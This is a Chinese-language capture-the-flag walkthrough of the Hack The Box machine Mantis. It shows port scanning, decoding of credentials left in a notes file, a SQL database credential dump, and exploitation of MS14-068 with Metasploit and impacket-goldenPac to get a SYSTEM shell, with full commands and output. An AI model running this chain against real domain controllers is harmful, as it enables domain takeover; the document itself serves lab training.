靶场:Hack The Box
系统:windows
内容:ms14-068(goldenPac)
扫描一下端口,根据扫描结果将htb.local和mantis.htb.local加入/etc/hosts。同时有个1337、8080开着http。
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-25 01:49:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.10.52:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-12-25T01:50:15+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-12-25T01:11:32
| Not valid after: 2054-12-25T01:11:32
| MD5: ff95:6b66:9495:0db1:47b1:0552:a3f1:d752
|_SHA-1: 770c:5ab6:b6e8:d67d:5b36:1b2d:f4cd:47a5:50f4:e0fb
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Microsoft IIS httpd 7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Tossed Salad - Blog
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/7.5
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.10.52:50255:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ms-sql-info:
| 10.10.10.52:50255:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 50255
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-12-25T01:11:32
| Not valid after: 2054-12-25T01:11:32
| MD5: ff95:6b66:9495:0db1:47b1:0552:a3f1:d752
|_SHA-1: 770c:5ab6:b6e8:d67d:5b36:1b2d:f4cd:47a5:50f4:e0fb
|_ssl-date: 2024-12-25T01:50:15+00:00; 0s from scanner time.
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2024-12-24T20:50:05-05:00
| smb2-time:
| date: 2024-12-25T01:50:01
|_ start_date: 2024-12-25T01:11:26
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 42m52s, deviation: 1h53m25s, median: 0s可能是机器配置和网络原因,目录扫描过程不是很稳定,这里直接给出结果:在1337端口会发现一个secure_notes文件夹,里面有个文件dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt。
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
...
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez 且这个文件的文件名是base64编码,解码后可以得到一串数字。
~/D/m $echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx |base64 -d
6d2424716c5f53405f504073735730726421 这串数字可以解码得到一个密码'm$$ql_S@_P@ssW0rd!'。
而文件名的那串二进制数,解码可以得到另一个密码@dm!n_P@ssW0rd!。
使用admin:@dm!n_P@ssW0rd!,可以登录orchard的后台。但后台没有什么可以利用的地方。使用另一个用户名和密码,可以登入sql,并且得到另一个用户的用户名和密码。
~/D/m $impacket-mssqlclient -db orcharddb -port 1433 htb.local/admin:'m$$ql_S@_P@ssW0rd!'@$IP
SQL (admin admin@orcharddb)> SELECT * FROM blog_Orchard_Users_UserPartRecord
Id UserName Email NormalizedUserName Password PasswordFormat HashAlgorithm PasswordSalt RegistrationStatus EmailStatus EmailChallengeToken CreatedUtc LastLoginUtc LastLogoutUtc
-- -------- --------------- ------------------ -------------------------------------------------------------------- -------------- ------------- ------------------------ ------------------ ----------- ------------------- ------------------- ------------------- -------------------
2 admin admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== Hashed PBKDF2 UBwWF1CQCsaGc/P7jIR/kg== Approved Approved NULL 2017-09-01 13:44:01 2017-09-01 14:03:50 2017-09-01 14:06:31
15 James james@htb.local james J@m3s_P@ssW0rd! Plaintext Plaintext NA Approved Approved NULL 2017-09-01 13:45:44 NULL NULL验证密码可用,但smb没有新发现。
~/D/m $netexec smb $IP -u james -p 'J@m3s_P@ssW0rd!'
SMB 10.10.10.52 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.52 445 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd!收集一下bloodhound信息。
~/D/m $netexec ldap $IP -u james -p 'J@m3s_P@ssW0rd!' --bloodhound --collection All --dns-server $IP
SMB 10.10.10.52 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP 10.10.10.52 389 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd!
LDAP 10.10.10.52 389 MANTIS Resolved collection methods: acl, group, trusts, session, rdp, localadmin, psremote, container, objectprops, dcom
LDAP 10.10.10.52 389 MANTIS Done in 00M 19S
LDAP 10.10.10.52 389 MANTIS Compressing output into /home/kali/.nxc/logs/MANTIS_10.10.10.52_2024-12-25_065636_bloodhound.zip在bloodhound里也没有找到什么突破口。这台机器的操作系统是OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1),比较旧了,尝试一下有没有MS14-068漏洞。
可以在msfconsole中验证机器存在这个漏洞,运行成功说明存在漏洞。
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > options
Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN htb.local yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD J@m3s_P@ssW0rd! yes The Domain User password
RHOSTS 10.10.10.52 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
l
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish Kerberos connection and read data
USERNAME james yes The Domain User
USER_SID S-1-5-21-4220043660-4019079961-2895681657-1103 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > run
[*] Running module against 10.10.10.52
[*] Validating options...
[*] Using domain HTB.LOCAL...
[*] 10.10.10.52:88 - Sending AS-REQ...
[*] 10.10.10.52:88 - Parsing AS-REP...
[*] 10.10.10.52:88 - Sending TGS-REQ...
[+] 10.10.10.52:88 - Valid TGS-Response, extracting credentials...
[*] 10.10.10.52:88 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20241225071035_default_10.10.10.52_mit.kerberos.cca_928118.bin
[*] Auxiliary module execution completed使用impacket-goldenPac可以得到system权限的shell,要注意@符号后面一定要接计算机名。
~/D/m $impacket-goldenPac htb.local/james:'J@m3s_P@ssW0rd!'@mantis.htb.local
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file BkstjXdj.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service LUvT on mantis.htb.local.....
[*] Starting service LUvT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system